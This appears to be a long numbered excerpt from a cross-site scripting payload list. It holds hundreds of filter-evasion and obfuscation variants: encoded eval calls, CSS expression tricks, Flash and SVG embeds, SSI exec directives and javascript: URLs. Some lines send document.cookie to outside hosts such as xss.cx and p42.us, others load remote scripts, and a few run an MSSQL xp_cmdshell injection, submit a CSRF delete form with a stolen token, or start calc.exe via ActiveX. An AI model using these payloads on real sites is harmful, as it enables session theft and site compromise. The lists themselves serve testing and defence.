  1709. <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
  1710. <div style=”x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))”>Joker</div>
  1711. <div style=”x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
  1712. <div style=”x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))”>Joker</div>
  1713. <div style=’x:anytext/**/xxxx/**/n(alert(1)) (“\”))))))expressio\”)’>aa</div>
  1714. <div style=’x:anytext/**/xxxx/**/n(confirm(1)) (“\”))))))expressio\”)’>aa</div> //
  1715. <div style=”x:expression(alert(1))”>Joker</div>
  1716. <div style=”x:expression((window.r==1)?’’:eval(‘r=1;
  1717. <div style=”x:expression((window.r==1)?’’:eval(‘r=1;
  1718. <div style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
  1719. <div/style==”x onclick=alert(1)//”>XSS’OR
  1720. <div style=xss:expres&#92sion(if(!window.x){alert(‘xss’);window.x=1;})></div>
  1721. <div style=x:x(“ onclick=alert(1)//”>XSS’OR
  1722. <div style=”z:exp/*anything*/res/*here*/sion(alert(1))” />
  1723. /div /template
  1724. <div title=”%&gt;&lt;/script&gt;&quot;&lt;img src=1 onerror=confirm(1)&gt;”></div>
  1725. div type=underscore/template % % /div
  1726. <div=’x=&quot;&#39&gt;&lt;iframe/onload=alert(1)&gt;’>
  1727. dnd →<script>alert(9)</script><! — %20
  1728. doc.documentElement.innerHTML+=’’;
  1729. doc=document.implementation.createHTMLDocument(‘&amp;lt;/title&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;’);
  1730. doc = new ActiveXObject(“htmlFile”);
  1731. <!doctype”:
  1732. <!DOCTYPE x[<!ENTITY x SYSTEM “http://html5sec.org/test.xxe">]><y>&x;</y>
  1733. “;document.body.addEventListener(“DOMActivate”,alert(1))//
  1734. “;document.body.addEventListener(“DOMActivate”,confirm(1))//
  1735. “;document.body.addEventListener(“DOMActivate”,prompt(1))//
  1736. document.body.appendChild(f);
  1737. document.body.appendChild(fo);
  1738. document.body.appendChild(fr);
  1739. document.body.innerHTML=(‘<\000\0i\000mg src=xx:x onerror=alert(1)>’)
  1740. document.body.innerHTML=(‘<\000\0i\000mg src=xx:x onerror=confirm(1)>’)
  1741. document.body.innerHTML=’”onerror=”alert(1)”>’.anchor(‘“><img src=’);
  1742. document.body.setAttribute(‘onclick’,’go();’);
  1743. “+document.cookie+”
  1744. document.cookie=’xss=xss;domain=.cx.’
  1745. ‘() {‘document.createElement(‘img’).src=’javascript:while(1){}’
  1746. [document.domain].find(alert)>
  1747. document.domain=’qq.com’
  1748. document.getElementById(‘form_xss’).submit();
  1749. document.getElementById(“iframe1”).contentDocument.getElementsByName(“owner”)[0].getElementsByTagName(“a”)[0].href;
  1750. document.getElementById(“iframe2”).contentDocument.forms[1].token.value;
  1751. document.getElementById(“iframe”).contentDocument.getElementById(“projects-dropdown”);
  1752. document.getElementById(“test”).innerHTML =” \u003cimg src=1 onerror=alert(/xss/)\u003e”;
  1753. document.getElementById(‘text’).innerHTML = ‘Click Here Again!’;
  1754. document.getElementById(‘text’).setAttribute(‘style’,’color:red;’);
  1755. document.getElementById(‘xss_content’).value = content;
  1756. document.getElementsByName(“login”).item(0).src = http://xss.cx/
  1757. document.getElementsByTagName(‘body’)[0].appendChild(form);
  1758. document.getElementsByTagName(‘body’)[0].appendChild(frame);
  1759. document.location=”http://xss.cx/default.aspx?c=" + document.cookie
  1760. document.location=unescape(“%19Jav%09asc%09ript:https ://foobar/%250Aconfirm%25281%2529”)
  1761. ‘},document.location=window.name+’//’+
  1762. document.location=window.name+’//’+
  1763. document.location=window.name%2b%27//%27%2b
  1764. $_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
  1765. $=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
  1766. \”;document.vulnerable=true;;//
  1767. &{document.vulnerable=true;};
  1768. document.write(a);
  1769. document.write(doc.documentElement.innerHTML)
  1770. document.write(‘<form><input id=p type=password></form>’);setTimeout(“alert(document.getElementById(‘p’).value)”, 50)
  1771. “;document.write(‘<img sr’%2b’c=http://p42.us/x.png?'%2bdocument['cookie']%2b'>');"
  1772. “;document.write(‘<img src=http://p42.us/x.png?'%2bdocument.cookie%2b'>');"
  1773. document.write(‘<img src=”<iframe/onload=confirm(1)>\0">’)
  1774. document.writeln(‘<form width=”0" height=”0" method=”POST” action=”’+x+’adminAdvanced.do”>’); document.writeln(‘<input type=”hidden” name=”token” value=”’ + token + ‘“ />’); document.writeln(‘<input type=”hidden” name=”deletebtn” value=”Delete+project” />’); document.writeln(‘</form>’); document.forms[0].submit();
  1775. document.write(‘<? oncl?ck=&#97&#108&#101&#114&#116&#40&#49&#41>asd</?>’.toUpperCase()
  1776. document.write(“<s”,”crip”,”t>al”,”ert(“,”1)”,”</s”,”cript>”)
  1777. document.write(“<scr”+”ipt language=javascript src=http://localhost/></scr"+"ipt>");
  1778. document.write(`<script>//# sourceMappingURL=https://pkav/?${escape(document.cookie)}</script>`)
  1779. ‘document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,115,58,47,47,119,119,119,46,110,48,48,112,121,46,105,111,47,101,118,105,108,46,106,115,39,62,60,47,115,99,114,105,112,116,62))’
  1780. document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,115,58,47,47,119,119,119,46,110,48,48,112,121,46,105,111,47,101,118,105,108,46,106,115,39,62,60,47,115,99,114,105,112,116,62))
  1781. document.write(String.fromCharCode(60,12,62)); ==== document.write(String.fromCharCode(<script src=http://xss.me/1></script>;));
  1782. ‘document.write(String.fromCharCode(‘+”,”.join([str(ord(n)) for n in payload])+’))’
  1783. document.write(String.fromCharCode(‘+”,”.join([str(ord(n)) for n in payload])+’))
  1784. →<d/ /ondrag=co\u006efir\u006d(2)>hello.
  1785. (double reflection, single input $p)
  1786. d=x.getImageData(t*3,Y=t*120%82,2,D=3).data
  1787. dXJjZSk=
  1788. $$=’e’
  1789. %E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
  1790. E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
  1791. ? (%E2%84%AA).toLowerCase() => k
  1792. %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80
  1793. % E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8%
  1794. (E=[A=[],g=!A+A][g[E=-~-~++A]+({}+A) [C=!!A
  1795. (E=[A=[],g=!A+A][g[E=-~-~++A]+({}+A) [C=!!A+g,a=C[A]+C[+!A],A]+a])() [g[A]+g[A+A]+C[E]+a](A)
  1796. e; alert(document.cookie); var foo=i
  1797. eat backlash: %bb”alert(1) (GBK charset)
  1798. echo $_GET[“p”];
  1799. echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
  1800. echo(‘IPT&gt;alert(\”XSS\”)&lt;/SCRIPT&gt;’); ?&gt;
  1801. <;? echo(‘;<;SCR)’;;
  1802. <? echo(‘<SCR)’;
  1803. <? echo(‘<scr)’; echo(‘ipt>alert(“XSS”)</script>’); ?>
  1804. <? echo(‘<scr)’; echo(‘ipt>alert(\”XSS\”)</script>’); ?>
  1805. <? echo(‘<SCR)’;echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
  1806. <? echo(‘<SCR)’;echo(‘IPT>document.vulnerable=true</SCRIPT>’); ?>
  1807. echo “<script>alert()</script>”
  1808. echo “<script>alert()</script>” >> /tmp/bin.bin
  1809. echo str_ireplace(“<script”, “”, $_GET[“q”]);
  1810. echo str_ireplace(“<script”,”InvalidTag”, $_GET[“r”]);
  1811. echo str_ireplace(“<script”,”<InvalidTag”, $_GET[“s”]);
  1812. echo str_replace(“ “, “”, $_GET[“q”]);
  1813. #eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
  1814. e = document.createElement(‘input’);
  1815. e.id = ‘xss_content’;
  1816. ??�E��img src=a onerror=javascript:alert(‘test’)>�K?��
  1817. E”><img src=”x:x” onerror=”alert(0)”>
  1818. element[attribute=’<img src=x onerror=alert(‘XSS’);>
  1819. <embed%20allowscriptaccess=always+src=https:html5sec.org/test.swf
  1820. <embed allowscriptaccess=”alwalwaysays” src=”test.swf”>
  1821. <embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/
  1822. <embed code=evil.swf allowscriptaccess=always>
  1823. <embed/code=//goo.gl/nlX0P?
  1824. <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  1825. <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf"allowscriptaccess=always>
  1826. <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
  1827. <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  1828. <Embed code = “http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess = always>
  1829. <embed code=”http://xss.cx/xss.swf" allowscriptaccess=always></embed>
  1830. <embed code=javascript:javascript:alert(1);></embed>
  1831. <embed code=%(scriptlet)s></embed>
  1832. <embed name=a flashvars=’autoplay=true&file=”})\”)-(alert=alert(1)))}catch(e){}//’ allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>
  1833. <embed name=’alert(1)-’ allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>
  1834. <embed onfocus=’popup=1;’><img
  1835. <embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>
  1836. <embed src=/aaa>
  1837. <embed src=”data:image/svg+xml;>
  1838. <EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>
  1839. <embed src=”data:text/html;base64,%(base64)s”>
  1840. <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>
  1841. <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></embed>
  1842. <embed src=data:textml;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
  1843. <embed src=evil.swf allowscriptaccess=always>
  1844. <embed/src=//goo.gl/nlX0P>
  1845. <embed/src=��//goo.gl/nlX0P��>
  1846. <Embed / src = // goo.gl/nlX0P>
  1847. <EMBED SRC=”http://3w.org/XSS/xss.swf" ></EMBED>
  1848. <embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
  1849. <embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  1850. <EMBED SRC=”http://hacker.com/xss.swf" AllowScriptAccess=”always”>
  1851. <;EMBED SRC=”;http://ha.ckers.org/xss.swf"; AllowScriptAccess=”;always”;>;<;/EMBED>;
  1852. <EMBED SRC=”http://ha.ckers.org/xss.swf" AllowScriptAccess=”always”></EMBED>
  1853. <EMBED SRC=”http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>
  1854. <EMBED SRC=”http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=”never” and allownetworking=”internal” it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf”AllowScriptAccess=”always”></EMBED>
  1855. EMBED SRC=”http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=”never” and allownetworking=”internal” it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf” AllowScriptAccess=”always”></EMBED>
  1856. <embed src=https://evil/>
  1857. <embed src=”javascript:alert(1)”>
  1858. <embed src=javascript:alert(1)> *
  1859. <embed src=javascript:alert(1)>
  1860. <embed src=javascript:alert(1)>
  1861. <embed src=javascript:alert(162)>
  1862. <embed src=”javascript:alert(1)”></embed>
  1863. <embed src=”javascript:alert(1)”></embed> // Firefox only
  1864. <embed src=”javascript:alert(1)”></embed> // O10.10, OM10.0, GC6, FF
  1865. <embed src=%(jscript)s></embed>
  1866. ?embed src=”lol.swf” width=”1337" height=”1337" FlashVars=”param=something&param2=somethingelse&param3=lol”?
  1867. <embed src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
  1868. <embed src=URL onload=alert(‘xss’)>
  1869. <embed src=/x//alert(1)><base href=”javascript:\
  1870. <embed type=”image” src=%(scriptlet)s></embed>
  1871. <embed width=500 height=500 code=”data:text/html,<script>%(payload)s</script>”>
  1872. <embed width=500 height=500 code=”data:text/html,<script>%(payload)s</script>”></embed>
  1873. Ember.run(null, alert, 9)
  1874. e.name = ‘c’;
  1875. encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)
  1876. encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)
  1877. encodeURIComponent(&#039;userinput&#039;)
  1878. encodeURIComponent (‘userinput’)
  1879. <![endif] →
  1880. “;escape=eval;//
  1881. e.type = ‘hidden’;
  1882. eval(0+location.string) //or 1+location.string
  1883. eval(0x258da033.toString(30))(1)
  1884. eval(“1+1?>”);eval(“1+1</script>”);eval(“1+1//?>”);
  1885. eval(1558153217..toString(36))(1)
  1886. eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))
  1887. eval(630038579..toString(30))(1)
  1888. eval(a+b+c+d);
  1889. eval(“ale” + (!![]+[])[+!+[]]+(!![]+[])[+[]])(1)
  1890. eval(‘ale’+’rt(0)’);
  1891. eval(`${`${`${`${`${`a`}`}`}`}`}${`${`${`${`${`l`}`}`}`}`}${`${`${`${`${`e`}`}`}`}`}${`${`${`${`${`r`}`}`}`}`}${`${`${`${`${`t`}`}`}`}`}${`${`${`${`${`(1)`}`}`}`}`}`)
  1892. eval(`ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(1)`);
  1893. eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));
  1894. eval.call(this,unescape.call(this,location))
  1895. eval(Dec(‘203041263543203’,’2549'));
  1896. eval(document.referrer.slice(10));
  1897. eval(JSON.stringify({a:1},null,’alert(1)//’))
  1898. eval(location.hash.slice(1));
  1899. eval(location.hash.slice(1))//
  1900. eval(location.hash.slice(1))
  1901. eval(location.hash.slice(1)>#alert(1)
  1902. “);eval(name+”
  1903. “+eval(name)+”
  1904. eval(name)
  1905. eval+name
  1906. eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))
  1907. eval(String.raw({[`raw`]:`aet(1)`},…`lr`))
  1908. eval(String.raw({raw:’aet(1)’},’l’,’r’))
  1909. eval(Symbol(‘)-alert(1’).toString())
  1910. eval(‘this.a;alert(1);//=”bbb”;’)
  1911. eval(‘this.a=”bbb”;alert(1);//”’)
  1912. $eval((toString()).constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)) }}
  1913. eval(‘\\u’+’0061'+’lert(1)’)
  1914. _=eval,__=unescape,___=document.URL,_(__(___))
  1915. “;eval(unescape(location))//# %0Aalert(0)
  1916. “;eval(unescape(location))//#%0Aprompt(0)
  1917. %”;eval(unescape(location))//#%0Aprompt(0)
  1918. eval(URL.slice(-8))>#alert(1)
  1919. eval(“\x61\x6c\x65\x72\x74\x28\x31\x29a?)
  1920. Event.prototype[0]=’@garethheyes’,Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert
  1921. Event.prototype[0]=’@garethheyes’,Event.prototype.length=1;Event.prototype.toString=[].join;onload=confirm
  1922. Event.prototype.toString=[].join;Event.prototype.length=1;Event.prototype[0]=1;onhashchange=alert;onmessage=alert;
  1923. <event-source src=”%(event)s” onload=”javascript:alert(1)”>
  1924. evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7 evil](cod)
  1925. ‘;exec%20master..xp_cmdshell%20’dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt’ — &&
  1926. <! — #exec cmd=”/bin/echo ‘<SCR’” →<! — #exec cmd=”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  1927. <! — #exec cmd=”/bin/echo ‘<SCR’” →<! — #exec cmd=”/bin/echo ‘IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
  1928. <! — #exec cmd=”/bin/echo ‘<SCRIPT
  1929. <;! — #exec cmd=”;/bin/echo ‘;<;SCRIPT SRC’;”; →;<;! — #exec cmd=”;/bin/echo ‘;=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
  1930. <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  1931. <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xss.cx/xss.js></SCRIPT>'"-->
  1932. <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xss.ha.ckers.org/a.js></SCRIPT>;'"-->
  1933. <! — #exec cmd=”/bin/echo ‘<SCRIPT SRC’” →<! — #exec cmd=”/bin/echo ‘=http://xxxx.com/xss.js></SCRIPT>'"-->
  1934. execScript()
  1935. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  1936. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  1937. $ exiftool -Artist=’”><img src=1 onerror=alert(1)>’ FILENAME.jpeg
  1938. exiftool -Artist= ><img src=1 onerror=alert(document.domain)> brute.jpeg
  1939. ‘,expanded:’\x2F’},function(file){path = file;document.getElementById(“pathbox”).value = path;});prompt(document.location);$(‘#fileTreeDemo_1’).fileTree({script:’../../administrator/ajaxtree/jqueryFileTree.cfm?type=dir
  1940. exp/*<A STYLE_NeatHtmlReplace=’no\xss:noxss(“*//*”);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’
  1941. exp/*<A STYLE=’no\xss:noxss(“*//*”);
  1942. exp/*<A STYLE=’no\xss:noxss(“**”);
  1943. exp/*<A STYLE=’no\xss:noxss(“*//*”); xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’>
  1944. exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’>
  1945. exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
  1946. exp/*<A STYLE=’no\xss:noxss(“*//*”);xss:ex/*XSS*//*/*/pression(document.vulnerable=true)’>
  1947. exp/*&lt;A STYLE=’no\xss&#58;noxss(\”*//*\”);
  1948. exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);
  1949. exppression(alert(“XSS”))’>
  1950. expr\65ssion(alert(1))
  1951. expression(alert(‘XSS’));
  1952. expressionG/style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
  1953. expression(open(alert(1)))
  1954. expression:/style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
  1955. expression <style>*{font-family:’Serif}’;x[value=expression(alert(URL=1));]{color:red}</style>
  1956. exp/*<;XSS STYLE=’;no\xss:noxss(“;*//*”;);
  1957. exp/*<XSS ?STYLE=’no\xss:noxss(“*//*”); ?
  1958. exp/*<XSS STYLE=’no\xss:noxss(“*//*”);
  1959. exp/*<XSS STYLE=’no\xss:noxss(“*//*”);xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(“XSS”))’>
  1960. ExternalInterface.call(“console.log”,q);
  1961. ExternalInterface.call(“document.write”,”<script>confirm(1)</script>”);
  1962. ExternalInterface.call(“eval”,”myWindow=window.open(‘’,’’,’width=200,height=100'); myWindow.document.write(\”<html><head><script src=\’http://xss.cx/xss.js\'></script></head><body>hi</body></html>\");myWindow.focus()");
  1963. ExternalInterface.call(“setTimeout”, ExternalInterface.objectID + ‘_event’ + “(‘“ + eventName + “‘,” + eventValues + “)”, 0);
  1964. external.NavigateAndFind(‘ ‘,[],[])
  1965. external.NavigateAndFind(‘http://xss.cx',[],[])
  1966. extra1 <tag extra2 handler=code> extra3
  1967. extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
  1968. extra1 <tag spacer1 handler spacer3 = spacer4 code spacer5 extra2> extra3 (without spacer2)
  1969. F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
  1970. %F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E
  1971. ( false + ���� )[1] = ��a��
  1972. false + ���� = ��false��
  1973. [F,A,L,S,E, T,R,U,E] = [!!0] + !0;
  1974. [F,A,L,S,E, T,R,U,E] = [!!0] + !0;A+L+E+R+T;
  1975. [F,B,Z,S,J, O,W,U,E] = [!!0] + !0;
  1976. [F,B,Z,S,J, O,W,U,E] = [!!0] + !0;B+Z+J+W+O;
  1977. [F,B,Z,S,J,O,W,U,E] = [!!0] + !0;eval(eval(“window.B+Z+window.J+window.W+O+’(0b10100111001??_�V)
  1978. f=document.createElement(iframe);
  1979. fetch(‘//0’).then(function(r){r.text().then(function(w){write(w)})})
  1980. f=’file=akismet/index.php’
  1981. Filename=”<<script>alert(‘xss’)<! — a →a.jpg”
  1982. [][`filter`][`constructor`](`ale`.concat(`rt\x28`.concat`0\x29`))();//
  1983. [].filter.constructor(‘ale’+’rt(4)’)();
  1984. Firefox clipboard-hijack without script and css : http://<img alt=”evil/#” width=0 height=0 >
  1985. Firefox cookie xss: with(document)cookie=’???��???��?????��????????��??????��?’,write(cookie);
  1986. FireFox: this[Object[“keys”](this)[5]](1)
  1987. firefoxurl:test|”%20-new-window%20javascript:alert(\’Cross%2520Browser%2520Scripting!\’);”
  1988. Firefox (\x09, \x0a, \x0d, \x20)
  1989. five={{insert(me._nodes.0.scriptprop)}}
  1990. flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
  1991. flash.external.ExternalInterface.call(alert, XSS);
  1992. flash.external.ExternalInterface.call(eval, cmd);
  1993. flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”);
  1994. flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”)
  1995. flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
  1996. flashmediaelement.swf?jsinitfunctio%gn=alert`1`
  1997. fo.appendChild(i);
  1998. fo = document.createElement(form);
  1999. fo.elements[0].value=follow;
  2000. ?FollowSite=0&SiteName=’-confirm(document.domain)-’
  2001. font-family:a/**/ression(alert(1))(‘\’)exp\’)
  2002. font-family:expression(alert)(1)
  2003.  
  2004. “><font size=70 color=red>
  2005. <font style=’color:expression(alert(1))’>
  2006. <font style=’color:expression(alert(document.cookie))’>
  2007. </font>/<svg><style>{src&#x3A;’<style/onload=this.onload=confirm(1)>’</font>/</style>
  2008. foo%00<script>alert(document.cookie)</script>
  2009. foo\; alert(document.cookie);//;
  2010. foo\��; alert(document.cookie);//��;
  2011. ?foobar=<script>if
  2012. foo\i; alert(document.cookie);//i;
  2013. <! foo=”[[[Inception]]”><x foo=”]foo><script>alert(1)</script>”>
  2014. <! foo=”[[[Inception]]”><x foo=”]foo><script>javascript:alert(1)</script>”>
  2015. <! foo=”><script>alert(1)</script>”>
  2016. <? foo=”><script>alert(1)</script>”>
  2017. </ foo=”><script>alert(1)</script>”>
  2018. foo<script>alert(1)</script>
  2019. foo<script>alert(document.cookie)</script>
  2020. foo<script>alert(/Xss-By-Muhaddi/)</script>
  2021. foo<script>alert(/Xss/)</script>
  2022. <? foo=”><script>confirm(1)</script>”>
  2023. <! foo=”><script>javascript:alert(1)</script>”>
  2024. <? foo=”><script>javascript:alert(1)</script>”>
  2025. </ foo=”><script>javascript:alert(1)</script>”>
  2026. “<foo>” + value + “</foo>”
  2027. <! ‘=”foo”><x foo=’><img src=x onerror=alert(2)//’>
  2028. <!’=”foo”><x foo=’><img src=x onerror=alert(2)//’>
  2029. <?’=”foo”><x foo=’><img src=x onerror=alert(2)//’>
  2030. <? ‘=”foo”><x foo=’><img src=x onerror=alert(3)//’>
  2031. <% foo><x foo=”%><script>alert(123)</script>”>
  2032. <? foo=”><x foo=’?><script>alert(1)</script>’>”>
  2033. <% foo><x foo=”%><script>alert(1)</script>”>
  2034. <? foo=”><x foo=’?><script>javascript:alert(1)</script>’>”>
  2035. <% foo><x foo=”%><script>javascript:alert(1)</script>”>
  2036. <! foo=”[[[x]]”><x foo=”]foo><script>alert(1)</script>”>
  2037. for(;D<15;)C+=!d[D+=4]
  2038. for(;D<19;)C+=!d[D+=4]
  2039. <foreignObject xlink:href=”data:text/xml,%3Cscript xmlns=’http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/>
  2040. <foreignObject xlink:href=”javascript:alert(1)”/>
  2041. for(i=0; i<targets.length; i++){
  2042. for(i=10;i>1;i — )confirm(i);new ActiveXObject(“WScript.shell”).Run(‘calc.exe’,1,true);
  2043. for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?]
  2044. for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
  2045. for(i in{????????????????:0})for(n in{constructor:0})[][?=n][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))(
  2046. for(i in n={????????????????:”constructor”})[][?=n[i]][?]
  2047. for(i in n={????????????????:”constructor”})[][?=n[i]][?](unescape([…escape(i)].filter((a,b)=>b%12<1|b%12>9?a:0).join([])))()
  2048. for((i)in(self))eval(i)(1)
  2049. for(location of [‘javascript:alert(/ff/)’]);
  2050. <formaction=&#039;data:text&sol;html
  2051. <formaction=&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;><button>CLICK
  2052. <formaction=&#039;data:text&sol;html,<script>alert(1)&lt/script&gt&#039;><button>CLICK
  2053. <form/action=’data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt’><button>CLICK
  2054. <formaction=’data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt’><button>CLICK
  2055. <form/action=’data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt’><button>CLICK // Mario
  2056. <form action=’data:text&sol;html,&lt;script&gt;confirm(1)&lt/script&gt’><button>CLICK
  2057. <form action=”http://brutelogic.com.br/chall/minified.php" method=”POST” enctype=”multipart/form-data”>
  2058. <form action=http://brutelogic.com.br/chall/minified.php method=POST enctype=multipart/form-data>
  2059. <form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)><button/type=submit>
  2060. <form action=javascript:alert(165)><input type=submit>
  2061. <form action=javascript:alert(1)><input type=submit>
  2062. <form action=javascript:alert(1)><input type=submit>
  2063. <form action=”Javascript:alert(1)”><input type=submit>
  2064. <form action=”Javascript:alert(1)”><input type=submit> // Firefox, IE
  2065. <form/action=javascript:alert(22)><input/type=submit>
  2066. formaction=javascript&colon;alert(21)>M
  2067. <form/action=javascript&#x0003A;eval(setTimeout(confirm(1)))><input/type=submit>
  2068. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=’submit’>//
  2069. //<form/action=javascript&#x3A;confirm&lpar;document&period;cookie&rpar;><input/type=’submit’>//
  2070. <form action=”javas&Tab;cript:confirm(1)” method=”get”><input type=”submit” value=”Submit”></form>
  2071. <form action=’java&Tab;scri&Tab;pt:confirm(1)’><button>CLICK
  2072. form.action = ‘<?php echo $url; ?>’
  2073. <form><a href=”javascript:\u0061lert(1)”>X
  2074. <form><a href=”javascript:\u0061lert&#x28;1&#x29;”>X
  2075. <form><a href=”javascript:\u0061lert&#x28;1&#x29;”>X</script><img/*/src=”worksinchrome&colon;prompt&#x28;1&#x29;”/*/onerror=’eval(src)’>
  2076. form.appendChild(e);
  2077. <form><button
  2078. <form><button formaction=”javascript:alert(123)”>crosssitespt
  2079. <form><button formaction=javascript:alert(167)>click
  2080. <form><button formaction=javascript:alert(1)>click
  2081. <form><button formaction=javascript:alert(1)>click
  2082. <form><button formaction=”javascript:alert(1)”>//INJECTX
